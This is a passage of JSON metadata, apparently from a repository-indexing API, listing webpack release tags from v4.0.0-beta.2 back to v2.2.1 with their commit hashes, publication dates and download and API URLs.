ts"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","ki